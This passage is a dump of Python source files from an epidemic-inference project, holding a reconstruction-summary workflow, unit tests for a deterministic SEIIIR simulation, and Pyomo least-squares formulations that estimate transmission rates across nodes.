OUTPUT.write(\"fips,\"+\",\".join(values)+\",date,series,mean,Q25,Q50,Q75\")\n OUTPUT.write(\"\\n\")\n first=False\n\n for fips in counties:\n if not fips in raw:\n continue\n _value = tuple(raw[fips][val] for val in values)\n for d in range(len(raw[fips]['dates'])):\n for s in series:\n dateval = raw[fips]['dates'][d]\n if (fips,_value,dateval) not in data:\n data[fips,_value,dateval] = {}\n if s not in data[fips,_value,dateval]:\n data[fips,_value,dateval][s] = []\n data[fips,_value,dateval][s].append( float(raw[fips][s][d]) )\n\n sys.stdout.write(\".\")\n sys.stdout.write(\"\\n\")\n\n for key in sorted(data.keys()):\n fips, _value, d = key\n\n for s in series:\n vals = data[key][s]\n mean = np.mean(vals)\n quartiles = np.quantile(vals, [0.25, 0.5, 0.75])\n\n prefix = list(map(str,[fips]+list(_value)+[d,s]))\n results = [str(mean), str(quartiles[0]), str(quartiles[1]), str(quartiles[2])]\n OUTPUT.write(\",\".join(prefix + results))\n OUTPUT.write(\"\\n\")\n\n\ndef recon_summary(input_json_files, output_csv, scenario_index, counties=None):\n # Write CSV file\n print(\"Writing reconstruction summary: \"+output_csv)\n\n with open(output_csv,'w') as OUTPUT:\n summary_narrow(OUTPUT, input_json_files, scenario_index, counties)\n\n\nclass Recon_Summary_Workflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"recon_summary\",\n \"Summarize reconstructions in a CSV file.\")\n\n def validate(self, CONFIG):\n valid_options = set(['scenario_index', 'input_json', 'output_csv', 'counties', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n recon_summary(\n CONFIG['input_json'],\n counties=CONFIG.get('counties',[]),\n output_csv=CONFIG['output_csv'],\n scenario_index=CONFIG['scenario_index'])\n\n\nregister_task(Recon_Summary_Workflow())\n\n" }, { "alpha_fraction": 0.36374202370643616, "alphanum_fraction": 0.6812484264373779, "avg_line_length": 57.76585388183594, "blob_id": "c9190a1420aae6d5959c7887cf6eede8eb53213d", "content_id": "64238419951c28b1a665161fe33eeb79b73e4e3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12047, "license_type": "no_license", "max_line_length": 469, "num_lines": 205, "path": "/epi_inference/simulation/tests/test_simulation.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport numpy as np\nfrom epi_inference.simulation.simulation import simulate_discrete_seiiir_deterministic\nfrom epi_inference.util import roundall\n\ndef test_simulate_discrete_seiiir_deterministic():\n \"\"\"\n Test a short simulation with the seiiir deterministic model\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 1, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n beta = 1\n rho = 1\n report_delay = 7\n tf=10\n\n results = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=None)\n\n C = results.cumulative_reported_cases.values\n Cdates = results.cumulative_reported_cases.dates\n SEIIIR = results.SEIIIR\n \n assert len(Cdates) == len(SEIIIR.dates)+1\n delta = Cdates[1] - SEIIIR.dates[0]\n assert delta.days == report_delay\n assert SEIIIR.S[0] == 1000000\n assert SEIIIR.E[0] == 0\n assert SEIIIR.I1[0] == 1\n assert SEIIIR.I2[0] == 0\n assert SEIIIR.I3[0] == 0\n assert SEIIIR.R[0] == 0\n assert SEIIIR.transmissions[0] == 1\n assert C[0] == 0\n\n assert SEIIIR.S[1] == 1000000-1\n assert SEIIIR.E[1] == 1\n assert SEIIIR.I1[1] == pytest.approx(0.25)\n assert SEIIIR.I2[1] == pytest.approx(0.75)\n assert SEIIIR.I3[1] == 0\n assert SEIIIR.R[1] == 0\n assert SEIIIR.transmissions[1] == pytest.approx(1.0*999999/1000000)\n\n expS = [1000000, 999999.0, 999998.000001, 999996.8000034, 999995.661882242, 999994.3121701872, 999992.5550166771, 999990.288982791, 999987.4325757417, 999983.8563387465]\n expE = [0, 1.0, 1.799999, 2.6399968000011995, 3.2501185980054688, 3.949806933169381, 4.916999056689872, 6.199633131502013, 7.8161135545123095, 9.829127838741329]\n expI1 = [1, 0.25, 0.2625, 0.4256247999999999, 0.63440556000024, 0.808625109601154, 0.9921176640341648, 1.2314292273465157, 1.5477839331370316, 1.9501686941867198]\n expI2 = [0, 0.75, 0.375, 0.290625, 0.3918748499999999, 0.5737728825001799, 0.7499120528259104, 0.9315662612321013, 1.1564634858179121, 1.4499538213072518]\n expI3 = [0, 0.0, 0.5625, 0.421875, 0.32343750000000004, 0.37476551249999995, 0.5240210400001349, 0.6934392996194666, 0.8720345208289425, 1.0853562445706697]\n expR = [0, 0.0, 0.0, 0.421875, 0.73828125, 0.9808593750000001, 1.261933509375, 1.654949289375101, 2.175028764089701, 2.829054654711408]\n expT = [1.0, 0.999999, 1.1999976000011998, 1.1381211580045094, 1.349712054765006, 1.7571535101543665, 2.2660338861501166, 2.856407049310699, 3.5762369951314814, 4.485406348014979]\n expC = [0, 1.0, 1.9999989999999999, 3.1999966000011995, 4.338117758005708, 5.6878298127707145, 7.444983322925081, 9.711017209075198, 12.567424258385897, 16.14366125351738, 20.62906760153236]\n\n np.testing.assert_allclose(np.asarray(expS), np.asarray(SEIIIR.S))\n np.testing.assert_allclose(np.asarray(expE), np.asarray(SEIIIR.E))\n np.testing.assert_allclose(np.asarray(expI1), np.asarray(SEIIIR.I1))\n np.testing.assert_allclose(np.asarray(expI2), np.asarray(SEIIIR.I2))\n np.testing.assert_allclose(np.asarray(expI3), np.asarray(SEIIIR.I3))\n np.testing.assert_allclose(np.asarray(expR), np.asarray(SEIIIR.R))\n np.testing.assert_allclose(np.asarray(expT), np.asarray(SEIIIR.transmissions))\n np.testing.assert_allclose(np.asarray(expC), np.asarray(results.cumulative_reported_cases.values))\n\n # test the reporting factor\n rho = 8\n results = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, rho, N, report_delay, tx=None)\n SEIIIR = results.SEIIIR\n np.testing.assert_allclose(np.asarray(expS), np.asarray(SEIIIR.S))\n np.testing.assert_allclose(np.asarray(expE), np.asarray(SEIIIR.E))\n np.testing.assert_allclose(np.asarray(expI1), np.asarray(SEIIIR.I1))\n np.testing.assert_allclose(np.asarray(expI2), np.asarray(SEIIIR.I2))\n np.testing.assert_allclose(np.asarray(expI3), np.asarray(SEIIIR.I3))\n np.testing.assert_allclose(np.asarray(expR), np.asarray(SEIIIR.R))\n np.testing.assert_allclose(np.asarray(expT), np.asarray(SEIIIR.transmissions))\n np.testing.assert_allclose(1/8*np.asarray(expC), np.asarray(results.cumulative_reported_cases.values))\n\ndef test_simulate_discrete_seiiir_deterministic_tx():\n \"\"\"\n Test a short simulation with the seiiir deterministic model including\n transmission from outside\n \"\"\"\n N = 1000000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5\n gamma = 1/4\n beta = 1\n rho = 1\n report_delay = 7\n tf=30\n tx = [0]*tf\n tx[10] = 1\n \n results = simulate_discrete_seiiir_deterministic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n Cdates = results.cumulative_reported_cases.dates\n C = results.cumulative_reported_cases.values\n SEIIIR = results.SEIIIR\n\n assert len(Cdates) == len(SEIIIR.dates)+1\n delta = Cdates[1] - SEIIIR.dates[0]\n assert delta.days == report_delay\n assert SEIIIR.S[0] == 1000000\n assert SEIIIR.E[0] == 0\n assert SEIIIR.I1[0] == 0\n assert SEIIIR.I2[0] == 0\n assert SEIIIR.I3[0] == 0\n assert SEIIIR.R[0] == 0\n assert SEIIIR.transmissions[0] == 0\n assert C[0] == 0\n\n assert SEIIIR.transmissions[10] == 1\n assert SEIIIR.S[11] == 1000000-1\n assert SEIIIR.E[11] == 1\n assert SEIIIR.I1[11] == 0\n assert SEIIIR.I2[11] == 0\n assert SEIIIR.I3[11] == 0\n assert SEIIIR.R[11] == 0\n\n\n assert SEIIIR.transmissions[11] == 0\n assert SEIIIR.S[12] == 1000000-1\n assert SEIIIR.E[12] == pytest.approx(0.8)\n assert SEIIIR.I1[12] == pytest.approx(0.2)\n assert SEIIIR.I2[12] == 0\n assert SEIIIR.I3[12] == 0\n assert SEIIIR.R[12] == 0\n\n t = 0.2*999999/1000000\n assert SEIIIR.transmissions[12] == pytest.approx(t)\n assert SEIIIR.S[13] == pytest.approx(1000000 - 1 - t)\n assert SEIIIR.E[13] == pytest.approx(0.8 - 0.8*1/5 + 0.2)\n assert SEIIIR.I1[13] == pytest.approx(0.2 + 0.8*1/5 - 0.2*3*1/4)\n assert SEIIIR.I2[13] == pytest.approx(0.2*3*1/4)\n assert SEIIIR.I3[13] == 0\n assert SEIIIR.R[13] == 0\n\n expT = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.1999998, 0.35999956800007205, 0.5279991363203962, 0.6500234843491176, 0.7899611612071538, 0.9833997294942862, 1.2399269425355373, 1.5632238454281848, 1.9658282341630997, 2.4697471508748774, 3.103237816906961, 3.9001484736462553, 4.902027026250278, 6.161128231301663, 7.743451993146161, 9.732090520466189, 12.231436853410257, 15.372620496106643]\n expS = [1000000, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 1000000.0, 999999.0, 999999.0, 999998.8000002, 999998.4400006321, 999997.9120014957, 999997.2619780113, 999996.4720168501, 999995.4886171207, 999994.2486901782, 999992.6854663327, 999990.7196380985, 999988.2498909476, 999985.1466531307, 999981.246504657, 999976.3444776307, 999970.1833493994, 999962.4398974063, 999952.7078068858, 999940.4763700324]\n expE = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1.0, 0.8, 0.8399998000000001, 1.0319994080000723, 1.353598662720454, 1.7329024145254808, 2.1762830928275383, 2.724426203756317, 3.419467905540591, 4.298798169860658, 5.404866770051626, 6.793640566916178, 8.538150270439903, 10.730668689998177, 13.48656197824882, 16.95037781390072, 21.303754244266738, 26.77509391587958, 33.651511986113924]\n expI1 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.21000000000000002, 0.22049996, 0.2615248716000145, 0.3361009504440945, 0.4306057205161198, 0.5429080486945377, 0.6806122529248979, 0.8540466443393429, 1.0732712950569674, 1.349291177774567, 1.6960509078268777, 2.1316427810447003, 2.6790444332608105, 3.367073503964967, 4.2318439387713855, 5.3187118335461925, 6.6846967415624645]\n expI2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.15000000000000002, 0.19500000000000003, 0.21412497000000005, 0.2496748962000109, 0.3144944368830736, 0.4015778996078582, 0.5075755114228678, 0.6373530675493905, 0.7998732501418546, 1.0049217838281892, 1.2631988292879723, 1.5878378881921515, 1.9956915578315628, 2.508206214403499, 3.1523566815746, 3.9619721244721893, 4.979526906277692]\n expI3 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.11250000000000002, 0.17437500000000003, 0.20418747750000005, 0.2383030415250082, 0.2954465880435573, 0.375045071716783, 0.4744429014963466, 0.5966255260361295, 0.7490613191154234, 0.9409566676499976, 1.1826382888784785, 1.4865379883637333, 1.8684031654646056, 2.3482554521687757, 2.9513313742231433, 3.709311936909928]\n expR = [0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.084375, 0.21515625000000002, 0.368296858125, 0.5470241392687561, 0.768609080301424, 1.0498928840890112, 1.405725060211271, 1.853194204738368, 2.4149901940749356, 3.1207076948124337, 4.007686411471292, 5.122589902744092, 6.523892276842547, 8.28508386596913, 10.498582396636486]\n expC = [0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.1999998, 1.559999368000072, 2.0879985043204683, 2.738021988669586, 3.5279831498767398, 4.511382879371026, 5.751309821906563, 7.314533667334748, 9.280361901497848, 11.750109052372725, 14.853346869279687, 18.75349534292594, 23.655522369176218, 29.81665060047788, 37.560102593624045, 47.29219311409023, 59.52362996750049, 74.89625046360713]\n\n np.testing.assert_allclose(np.asarray(expT), np.asarray(SEIIIR.transmissions))\n np.testing.assert_allclose(np.asarray(expS), np.asarray(SEIIIR.S))\n np.testing.assert_allclose(np.asarray(expE), np.asarray(SEIIIR.E))\n np.testing.assert_allclose(np.asarray(expI1), np.asarray(SEIIIR.I1))\n np.testing.assert_allclose(np.asarray(expI2), np.asarray(SEIIIR.I2))\n np.testing.assert_allclose(np.asarray(expI3), np.asarray(SEIIIR.I3))\n np.testing.assert_allclose(np.asarray(expR), np.asarray(SEIIIR.R))\n np.testing.assert_allclose(np.asarray(expC), np.asarray(C))\n\n # test the reporting factor\n rho = 8\n results = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, rho, N, report_delay, tx=tx)\n SEIIIR = results.SEIIIR\n np.testing.assert_allclose(np.asarray(expT), np.asarray(SEIIIR.transmissions))\n np.testing.assert_allclose(np.asarray(expS), np.asarray(SEIIIR.S))\n np.testing.assert_allclose(np.asarray(expE), np.asarray(SEIIIR.E))\n np.testing.assert_allclose(np.asarray(expI1), np.asarray(SEIIIR.I1))\n np.testing.assert_allclose(np.asarray(expI2), np.asarray(SEIIIR.I2))\n np.testing.assert_allclose(np.asarray(expI3), np.asarray(SEIIIR.I3))\n np.testing.assert_allclose(np.asarray(expR), np.asarray(SEIIIR.R))\n np.testing.assert_allclose(1/8*np.asarray(expC), np.asarray(results.cumulative_reported_cases.values))\n\ndef test_simulate_discrete_seiiir_deterministic_larger():\n \"\"\"\n Test a longer simulation with the seiiir deterministic model and verify\n the end conditions\n \"\"\"\n N = 1000\n y0={'S': N, 'E': 5, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4\n beta = 2.2*gamma\n rho = 1\n report_delay = 7\n tf=1000\n \n results = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, rho, N, report_delay, tx=None)\n C = results.cumulative_reported_cases.values\n T = results.SEIIIR.transmissions\n S = results.SEIIIR.S\n E = results.SEIIIR.E\n I1 = results.SEIIIR.I1\n I2 = results.SEIIIR.I2\n I3 = results.SEIIIR.I3\n R = results.SEIIIR.R\n assert sum(T) == results.cumulative_reported_cases.values[-1]\n C,T,S,E,I1,I2,I3,R = roundall(C,T,S,E,I1,I2,I3,R)\n \n assert C[-1] == R[-1]-5\n assert S[-1] == N - R[-1]+5\n assert E[-1] == 0\n assert I1[-1] == 0\n assert I2[-1] == 0\n assert I3[-1] == 0\n" }, { "alpha_fraction": 0.7622950673103333, "alphanum_fraction": 0.7622950673103333, "avg_line_length": 19.33333396911621, "blob_id": "4c44552b4846007d1c9f66d77ce2e9ecc643a81a", "content_id": "e8d1fbd19a19c0493128f3e81c17cc860b33fa6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/epi_inference/collect/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference.collect\n\nfrom . import load_results\nfrom . import misc\nfrom . import casedata_wf\nfrom . import expdata_wf\n" }, { "alpha_fraction": 0.6370334029197693, "alphanum_fraction": 0.64833003282547, "avg_line_length": 42.3138313293457, "blob_id": "b641a26c4111b13ac5444f0bb596472dc851d0aa", "content_id": "b8ff465c8eafbdbf1bb9707b03c8bcf9b342fc19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8144, "license_type": "no_license", "max_line_length": 199, "num_lines": 188, "path": "/epi_inference/formulations/attic/multinode_decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nimport pandas as pd\nfrom datetime import datetime\nfrom . import reconstruction as recon\n\ndef run_multinode_decay_lsq(cm_rep_cases, populations, sigma, gamma, report_delay, reporting_factor, analysis_window, Cdates, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n\n cm_rep_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cm_rep_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # check the inputs\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert (populations > 0).all().all() == True\n assert reporting_factor >= 1\n\n # create the Pyomo optimization formulation\n m = create_inference_formulation_multinode_decay_lsq(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n populations=populations,\n sigma=sigma,\n gamma_1=gamma*3,\n gamma_2=gamma*3,\n gamma_3=gamma*3,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n verbose=verbose\n)\n\n # call the solver\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n # check that the beta value was successfully solved\n if m.beta.stale == True:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Transmission parameter beta not solved (stale).'}\n\n return {'est_beta': value(m.beta),'status': 'ok', 'msg': 'Optimal solution found'}\n\ndef create_inference_formulation_multinode_decay_lsq(Cdates, cumulative_reported_cases, populations, sigma, gamma_1, gamma_2, gamma_3, report_delay, reporting_factor, analysis_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n Cdates: list of datetime objects\n The list of datetime objects that correspond to the dates for the\n cumulative_reported_cases\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma_1 : float\n the rate constant for leaving the I1 compartment.\n gamma_2 : float\n the rate constant for leaving the I2 compartment.\n gamma_3 : float\n the rate constant for leaving the I3 compartment.\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n if len(analysis_window) != 0:\n raise NotImplementedError('analysis_window is not yet implemented for multinode_decay_lsq')\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.report_delay = report_delay\n model.reporting_factor = reporting_factor\n\n model.beta = pe.Var(initialize=1.3, bounds=(0,None)) # transmission parameter\n # for now, alpha is not used\n # model.alpha = pe.Var(initialize=1.0)\n # model.alpha.fix(1.0)\n\n #model.A = pe.Set(initialize=[v for v in cumulative_reported_cases.keys().to_list()])\n model.A = pe.Set(initialize=list(range(len(cumulative_reported_cases.keys()))))\n\n def block_rule(B, nodeid):\n # Cached data\n B.N = float(populations.iloc[nodeid]) # overall population\n cm_rep_cases_node = [v[0] for v in cumulative_reported_cases.iloc[:, [nodeid] ].values]\n\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = \\\n recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases_node,\n population=B.N,\n sigma=sigma,\n gamma=gamma_1/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n\n if verbose: # pragma: no cover\n print('corrected case data being used:')\n print(T)\n\n # define the set of times\n B.timesteps = [i for i in range(len(T))]\n B.TIMES = pe.Set(initialize=B.timesteps, ordered=True)\n #B.TIMES_m_one = pe.Set(initialize=B.timesteps[1:], ordered=True)\n\n # define the case count variables\n B.T_hat = pe.Var(B.TIMES, initialize=1.0)\n\n # infection process\n def _infection_process(b, t):\n return b.T_hat[t] == model.beta * (I1[t] + I2[t] + I3[t]) * S[t] / b.N\n B.infection_process = pe.Constraint(B.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(b):\n return sum( (b.T_hat[t] - T[t])**2 for t in b.TIMES)\n B.lse = pe.Expression(rule=_lse)\n\n model.b = pe.Block(model.A, rule=block_rule)\n\n def _total_lse(m):\n return sum( m.b[a].lse for a in m.A )\n model.total_lse = pe.Objective(rule=_total_lse)\n\n ## likelihood objective function\n #def _like(m):\n # #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n # return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n #model.like = pe.Objective(rule=_like, sense=pe.maximize)\n #model.like.deactivate()\n\n return model\n\n" }, { "alpha_fraction": 0.7633135914802551, "alphanum_fraction": 0.7633135914802551, "avg_line_length": 20.125, "blob_id": "a759cab50f4d17730484a1d61fcb96e2285afe14", "content_id": "acb6e0abeb2c878a120a9968f4fd6e9ce47505c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "no_license", "max_line_length": 31, "num_lines": 8, "path": "/epi_inference/engine/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# Defining core engine logic\n\nfrom . import task\nfrom . import task_registry\nfrom . import config_parameters\nfrom . import misc\nfrom . import util\nfrom . import meta_wf\n" }, { "alpha_fraction": 0.541436493396759, "alphanum_fraction": 0.5469613075256348, "avg_line_length": 31.417909622192383, "blob_id": "057714f186cfc1a4d618c06a27247365c147d9be", "content_id": "73c06f4812aaaa477c07d10d05fc0f24b65c9081", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2172, "license_type": "no_license", "max_line_length": 103, "num_lines": 67, "path": "/epi_inference/formulations/util.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['get_windows']\n\nimport datetime\nfrom pyutilib.misc import Options\n\ndef get_windows(dates, last_day_of_window=5, window_days=7, select_window=None):\n ans = Options()\n ans.TIMES = [i for i in range(len(dates))]\n ans.WINDOW_TIMES_LIST = []\n ans.WINDOWS = []\n ans.WINDOW_TIMES = {}\n\n for i in ans.TIMES:\n if datetime.date.fromisoformat(dates[i]).weekday() != last_day_of_window:\n continue\n #if i < window_days-1:\n if i < window_days:\n continue\n\n ans.WINDOW_TIMES[i] = []\n for j in range(i+1-window_days, i+1):\n ans.WINDOW_TIMES_LIST.append((i,j)) \n ans.WINDOW_TIMES[i].append(j) \n ans.WINDOWS.append(i)\n\n if len(ans.WINDOWS) == 0:\n return ans\n\n if select_window is not None:\n if select_window == 'last':\n select_val = ans.WINDOWS[-1]\n ans.WINDOWS = [select_val]\n ans.WINDOW_TIMES_LIST = [(i,j) for i,j in ans.WINDOW_TIMES_LIST if i==select_val]\n ans.WINDOW_TIMES = {select_val:ans.WINDOW_TIMES[select_val]}\n else:\n select_val=None\n for i in ans.WINDOWS:\n if datetime.date.fromisoformat(dates[i]) == datetime.date.fromisoformat(select_window):\n select_val=i\n break\n if select_val == None:\n ans.WINDOWS = []\n ans.WINDOW_TIMES_LIST = []\n ans.WINDOW_TIMES = {}\n else:\n ans.WINDOWS = [select_val]\n ans.WINDOW_TIMES_LIST = [(i,j) for i,j in ans.WINDOW_TIMES_LIST if i==select_val]\n ans.WINDOW_TIMES = {select_val:ans.WINDOW_TIMES[select_val]}\n\n return ans\n\ndef indices_since_first_nonzero(data):\n idx_first = None\n for i,v in enumerate(data):\n if v > 0:\n idx_first = i\n break\n\n if idx_first is None:\n return [0]*len(data)\n\n indices_since_first_nz = list()\n for i in range(len(data)):\n indices_since_first_nz.append(0)\n if i > idx_first:\n indices_since_first_nz[i] = indices_since_first_nz[i-1]+1\n return indices_since_first_nz\n" }, { "alpha_fraction": 0.469696968793869, "alphanum_fraction": 0.7045454382896423, "avg_line_length": 17.85714340209961, "blob_id": "644c83880821c19c1b50eb2129ab200c7a5cc0a6", "content_id": "4ae8aaa8b2e09ba6fc970c84ef2b9ddae8b3bc6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 132, "license_type": "no_license", "max_line_length": 62, "num_lines": 7, "path": "/examples/expdata/exp1/info.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# Experimental results generated for around_md seeded at 24031\n#\nbeta = 0.75\nR0 = 3.0\ngamma = 0.25\nsigma = 0.1923076923076923\n" }, { "alpha_fraction": 0.6181545853614807, "alphanum_fraction": 0.6289839744567871, "avg_line_length": 41.06296157836914, "blob_id": "1ce0e44121c806687d77a8857017542ad52de44b", "content_id": "55e5078d96ab7f00f699038b3c726c651403adb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11358, "license_type": "no_license", "max_line_length": 218, "num_lines": 270, "path": "/epi_inference/formulations/multinode_mobility_decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nimport pandas as pd\nfrom datetime import datetime\nimport epi_inference.reconstruction.common as rcommon\nimport epi_inference.reconstruction.deterministic as recond\n\ndef run_multinode_mobility_decay_lsq(cm_rep_cases, populations, mobility, sigma, gamma, report_delay, reporting_factor, analysis_window, Cdates, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n\n cm_rep_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cm_rep_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # check the inputs\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert (populations > 0).all().all() == True\n assert reporting_factor >= 1\n\n # ToDo: this needs to be passed in - for now create a default set of dates\n #Cdates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=len(cm_rep_cases)).to_pydatetime().tolist()\n\n # create the Pyomo optimization formulation\n m = create_inference_formulation_multinode_mobility_decay_lsq(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n populations=populations,\n mobility=mobility,\n sigma=sigma,\n gamma_1=gamma*3,\n gamma_2=gamma*3,\n gamma_3=gamma*3,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n verbose=verbose\n )\n\n # call the solver\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n results = list()\n for i in m.NODES:\n d = dict()\n if m.beta[i].stale == True:\n d['est_beta'] = None\n d['status'] = 'stale'\n else:\n d['est_beta'] = value(m.beta[i])\n d['status'] = 'ok'\n d['population'] = populations[i]\n d['total_cases'] = cm_rep_cases[i][-1]\n d['FIPS'] = i\n results.append(d)\n\n return {'results': results}\n\n \"\"\" OLD RESULTS STRUCTURE\n # check that the beta value was successfully solved\n betas = list()\n status = list()\n fips = list()\n pops = list()\n casecount = list()\n for i in m.NODES:\n fips.append(i)\n pops.append(populations[i])\n casecount.append(cm_rep_cases[i][-1])\n if m.beta[i].stale == True or cm_rep_cases[i][-1] < 3:\n status.append('invalid_insufficient_data')\n betas.append(None)\n else:\n 